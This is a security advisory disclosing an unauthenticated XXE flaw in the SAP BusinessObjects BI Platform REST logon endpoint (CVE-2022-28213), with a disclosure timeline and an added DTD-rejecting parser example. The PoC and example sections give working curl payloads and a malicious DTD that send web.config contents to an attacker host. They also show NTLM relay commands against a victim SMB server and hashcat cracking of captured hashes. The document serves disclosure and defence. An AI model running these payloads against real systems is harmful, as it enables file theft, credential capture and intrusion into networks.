### Description
The SOAP web services in SAP BusinessObjects Intelligence (BI) Platform versions 4.2 and 4.3 suffer from a remote, unauthenticated XML External Entity (XXE) vulnerability caused by insufficient XML validation. It can allow threat actors to read arbitrary files, trigger a Denial of Service (DoS), or force the server to authenticate to a remote host, which can subsequently be used to capture credential hashes and execute NTLM relay attacks in the context of the underlying SAP service account.
### Vulnerability Type
Improper Restriction of XML External Entity Reference (CWE-611)
### Vendor of Product
SAP Software Solutions
### Affected Product Code Base
SAP BusinessObjects Intelligence Platform version 4.2 and 4.3
### Affected Component
| Component | Version | Endpoint |
|---|---|---|
| Session Management in the BI Platform REST API | 4.2-4.3 | `biprws/logon/long` |
### Attack Type
Unauthenticated / Remote
### Impact: Code Execution
false
### Attack Vectors
Remote, unauthenticated threat actors can exploit this vulnerability with a specially crafted POST request to compromise the confidentiality of arbitrary files on the vulnerable system, impact availability by triggering a DoS condition, compromise the confidentiality of the underlying service account's credential hashes through forced authentication, or obtain unauthorized access to other systems on the network in the context of the underlying SAP account through MITM/NTLM relay attacks.
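Added example (not code from the advisory or from SAP): the mitigation side of the issue above. An XML request body is refused at the parser as soon as it carries a DOCTYPE, entity declaration or external reference, which is what "sufficient XML validation" amounts to for a logon endpoint that never needs a DTD. The rejected input is the advisory's own DTD payload; the benign logon body is a constructed stand-in, since the real request schema is not on this page.

```python
# Added example (not SAP's code): refuse any DTD in an XML request body before parsing it.
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """A request body carried a DOCTYPE, entity declaration or external reference."""


def parse_without_dtd(body: bytes):
    """Parse body with expat and return the element names seen, in document order.

    Every variant in the advisory (file read, DoS, forced authentication) starts
    with a <!DOCTYPE ...> declaring entities, so the parse is aborted the moment a
    doctype, entity declaration or external reference appears; nothing is resolved.
    """
    parser = xml.parsers.expat.ParserCreate()
    elements = []

    def rejecting(what):  # build a handler that aborts the parse with a clear reason
        def handler(*args):
            raise DoctypeRejected(f"{what} not accepted on this endpoint: {args[0]!r}")
        return handler

    parser.StartDoctypeDeclHandler = rejecting("DOCTYPE")  # fires before any subset is read
    parser.EntityDeclHandler = rejecting("entity declaration")
    parser.ExternalEntityRefHandler = rejecting("external entity reference")
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(body, True)  # an exception raised inside a handler propagates out of Parse()
    return elements


def body_is_accepted(body: bytes) -> bool:
    """Request-filter view: True only for well-formed XML that carries no DTD at all."""
    try:
        parse_without_dtd(body)
        return True
    except (DoctypeRejected, xml.parsers.expat.ExpatError):
        return False


# The advisory's own file-read payload, taken from the PoC section of this page.
XXE_PAYLOAD = (b'<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote '
               b'SYSTEM "https://attackerwebsite.com/XXE.dtd">%remote;%int;%trick;]>')

# Constructed stand-in for a legitimate logon body; the real schema is not on this page.
BENIGN_LOGON_BODY = (b'<attrs><attr name="userName" type="string">Administrator</attr>'
                     b'<attr name="password" type="string">[REDACTED]</attr></attrs>')
```

Rejecting the DOCTYPE outright is preferable to trying to filter individual entity references, because the forced-authentication and DoS variants on this page need no file path at all, only a declaration the parser is willing to process.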
### Reference
[Product Website](https://www.sap.com/)
[Product Download](https://www.sap.com/)
### Discoverer
West Shepherd
west[at]westlshepherd.com
### Advisory ID
CVE-2022-28213
### Report Timeline
| Date | Action |
|---|---|
| 1/27/2022 | Discovered vulnerability, contacted vendor. |
| 2/14/2022 | Vendor released security patches (security note 3055044). |
| 3/30/2022 | Vendor published CVE-2022-28213. |
| 4/19/2022 | Confirmed with vendor that product is sufficiently patched. |
| 4/21/2022 | Ethical disclosure of details and proof-of-concept code. |
### PoC
```
# Exploit Title: XXE - SAP BusinessObjects Intelligence 4.2 and 4.3 REST API
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long
```
### Examples
#### Reading Arbitrary Files
```
1. Triggering the XXE vulnerability:
root@attackerwebsite.com:~/SAP/XXE# curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "https://attackerwebsite.com/XXE.dtd">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<error>
<error_code>RWS 000079</error_code>
<message>Enter a valid input (RWS 000079)</message>
</error>
2. Reading arbitrary files:
root@attackerwebsite.com:~/SAP/XXE# screen -S https
root@attackerwebsite.com:~/SAP/XXE# cat /var/www/html/XXE.dtd
<!ENTITY % payl SYSTEM "file:///c:/inetpub/wwwroot/web.config">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://attackerwebsite.com/?p=%payl;'>">
root@attackerwebsite.com:~/SAP/XXE# service apache2 start
[detached from 3986.https]
root@attackerwebsite.com:~/SAP/XXE# nohup python3 -m http.server 80 2>/dev/null 1>> ~/loot/web.config &
[1] 3884
root@attackerwebsite.com:~/SAP/XXE# cat ~/loot/web.config
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.8.8.2 - - [07/Jan/2022 09:22:35] "GET /XXE.dtd?payl=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0A%3Cconfiguration%3E%0A%20%20%3CconnectionStrings%3E%0A%20%20%20%20%3Cadd%20name%3D%22DBConnection%22%20connectionString%3D%22server%3Ddb-victim.example.com%3Bdatabase%3DExampleDB%3Buid%3Dvictim.com%5Csvcaccount%3Bpassword%3DBadP%40ssw0rd123%3B%22%20/%3E HTTP/1.1" 200 -
...[snip]...
```
#### Forced Authentication
```
1. Triggering the XXE vulnerability:
root@attackerwebsite.com:~/SAP/XXE# curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<error>
<error_code>RWS 000079</error_code>
<message>Enter a valid input (RWS 000079)</message>
</error>
2. Performing NTLM relay against remote systems and capturing SAP hashes:
root@attackerwebsite.com:~/SAP/XXE# screen -S relay
root@attackerwebsite.com:~/SAP/XXE# nohup impacket-ntlmrelayx -ts -smb2support --no-http-server \
--no-wcf-server -ip 10.8.8.2 --serve-image ~/relay/forcedauth -i \
--output-file hashes --lootdir ~/loot -ntlmchallenge 88B2FC3A75AA60D4 \
-t smb://victim.example.com 2>&1>> relay.log &
[1] 3196
root@attackerwebsite.com:~/SAP/XXE# nc -v localhost 11000
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
C$
IPC$
wwwroot
# use wwwroot
[detached from 3206.relay]
3. Cracking SAP NetNTLMv2 hashes obtained:
root@attackerwebsite.com:~/SAP/XXE# screen -S hashes
root@attackerwebsite.com:~/SAP/XXE# ls ~/loot/hashes_ntlmv2
hashes_ntlmv2
root@attackerwebsite.com:~/SAP/XXE# hashcat -m 5600 -a 0 ~/loot/hashes_ntlmv2 rockyou.txt --force
[detached from 3469.hashes]
```
### PGP